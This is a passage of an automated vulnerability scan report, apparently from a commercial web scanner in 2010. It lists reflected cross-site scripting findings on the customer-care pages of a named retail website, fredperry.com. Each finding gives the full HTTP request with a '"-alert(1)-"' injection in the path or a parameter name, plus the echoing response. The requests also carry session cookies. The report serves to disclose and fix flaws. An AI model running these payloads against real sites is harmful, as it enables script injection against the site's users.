Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:16:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=34gef0dea5ctpbtgku4qtilqc2; expires=Tue, 09-Nov-2010 17:16:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare41986"-alert(1)-"bad21956557/");
//]]>
...[SNIP]...

1.39. http://www.fredperry.com/customercare/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 900a1"-alert(1)-"6e32b2c374e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/?900a1"-alert(1)-"6e32b2c374e=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=75qs3uusvp70t54vc3kcgds952; expires=Tue, 09-Nov-2010 17:16:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/?900a1"-alert(1)-"6e32b2c374e=1");
//]]>
...[SNIP]...

1.40. http://www.fredperry.com/customercare/delivery/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/delivery/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75a54"-alert(1)-"6789d05419e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare75a54"-alert(1)-"6789d05419e/delivery/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:17:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=34tn4624mcd4thnbsvokvo7nf0; expires=Tue, 09-Nov-2010 17:17:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare75a54"-alert(1)-"6789d05419e/delivery/");
//]]>
...[SNIP]...

1.41. http://www.fredperry.com/customercare/delivery/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/delivery/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eacb"-alert(1)-"257fda257ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/delivery3eacb"-alert(1)-"257fda257ac/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:17:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=41nrhbjdpjk7dkmn0nohfukmf3; expires=Tue, 09-Nov-2010 17:17:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/delivery3eacb"-alert(1)-"257fda257ac/");
//]]>
...[SNIP]...

1.42. http://www.fredperry.com/customercare/delivery/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/delivery/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd5f1"-alert(1)-"ada1d66d6a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/delivery/?dd5f1"-alert(1)-"ada1d66d6a4=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j247u2arg3uide75hgajfi3le2; expires=Tue, 09-Nov-2010 17:16:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Deliver
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/delivery/?dd5f1"-alert(1)-"ada1d66d6a4=1");
//]]>
...[SNIP]...

1.43. http://www.fredperry.com/customercare/deliverylate/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/deliverylate/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c11fc"-alert(1)-"e04e37a7eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercarec11fc"-alert(1)-"e04e37a7eb/deliverylate/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:17:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l4erk5aec401u2f60cqm0060o6; expires=Tue, 09-Nov-2010 17:17:13 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercarec11fc"-alert(1)-"e04e37a7eb/deliverylate/");
//]]>
...[SNIP]...

1.44. http://www.fredperry.com/customercare/deliverylate/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/deliverylate/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3ddd"-alert(1)-"ca7404da0f0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/deliverylatee3ddd"-alert(1)-"ca7404da0f0/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:17:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=m3t49fuevbtdncf9jjst5c8de7; expires=Tue, 09-Nov-2010 17:17:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/deliverylatee3ddd"-alert(1)-"ca7404da0f0/");
//]]>
...[SNIP]...

1.45. http://www.fredperry.com/customercare/deliverylate/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/deliverylate/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95c50"-alert(1)-"6baf5d54777 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/deliverylate/?95c50"-alert(1)-"6baf5d54777=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sfs2d8bi9ii4tkdsp5it7l2l11; expires=Tue, 09-Nov-2010 17:16:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Late De
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/deliverylate/?95c50"-alert(1)-"6baf5d54777=1");
//]]>
...[SNIP]...

1.46. http://www.fredperry.com/customercare/faq/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/faq/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae5a"-alert(1)-"40f1ed9aa59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercaredae5a"-alert(1)-"40f1ed9aa59/faq/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jdmst23utqklf1vmkl2k49ph12; expires=Tue, 09-Nov-2010 17:21:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercaredae5a"-alert(1)-"40f1ed9aa59/faq/");
//]]>
...[SNIP]...

1.47. http://www.fredperry.com/customercare/faq/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/faq/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e6e4"-alert(1)-"7c11dc98e25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/faq5e6e4"-alert(1)-"7c11dc98e25/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9l0k5hcfbprm6okg0o12cfko46; expires=Tue, 09-Nov-2010 17:21:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/faq5e6e4"-alert(1)-"7c11dc98e25/");
//]]>
...[SNIP]...

1.48. http://www.fredperry.com/customercare/faq/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/faq/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c9f6"-alert(1)-"ff55126c3f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/faq/?8c9f6"-alert(1)-"ff55126c3f8=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:20:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l69or4lakblg95828idk00ijs0; expires=Tue, 09-Nov-2010 17:20:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Frequen
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/faq/?8c9f6"-alert(1)-"ff55126c3f8=1");
//]]>
...[SNIP]...

1.49. http://www.fredperry.com/customercare/information/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/information/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c1d2"-alert(1)-"42fbc0107c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare7c1d2"-alert(1)-"42fbc0107c9/information/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=kiqa43s52v9mfokqjcgequat17; expires=Tue, 09-Nov-2010 17:18:22 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare7c1d2"-alert(1)-"42fbc0107c9/information/");
//]]>
...[SNIP]...

1.50. http://www.fredperry.com/customercare/information/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/information/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 477f5"-alert(1)-"ef99901e51e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/information477f5"-alert(1)-"ef99901e51e/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r1u2itv5omnem2c1mrj2n6ief5; expires=Tue, 09-Nov-2010 17:18:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/information477f5"-alert(1)-"ef99901e51e/");
//]]>
...[SNIP]...

1.51. http://www.fredperry.com/customercare/information/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/information/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24020"-alert(1)-"c2e99d599f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/information/?24020"-alert(1)-"c2e99d599f1=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=e2t4iqbtg99k0fjj3tlm51ga61; expires=Tue, 09-Nov-2010 17:17:43 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Customs
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
